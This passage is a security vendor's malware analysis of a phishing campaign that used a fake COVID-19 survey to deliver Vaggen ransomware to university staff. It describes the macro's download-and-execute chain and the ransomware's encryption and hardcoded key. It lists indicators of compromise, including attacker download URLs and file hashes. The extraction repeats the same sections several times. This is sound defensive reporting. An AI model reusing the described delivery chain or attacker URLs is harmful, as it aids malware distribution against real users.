3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2092 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2093 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2094 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2095 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2096 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2097 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2098 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2099 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2100 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2101 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2102 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2103 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2104 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2105 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2106 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2107 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2108 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2109 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2110 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2111 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2112 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2113 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2114 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2115 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2116 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2117 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2118 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2119 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2120 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2121 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2122 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2123 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2124 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2125 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this 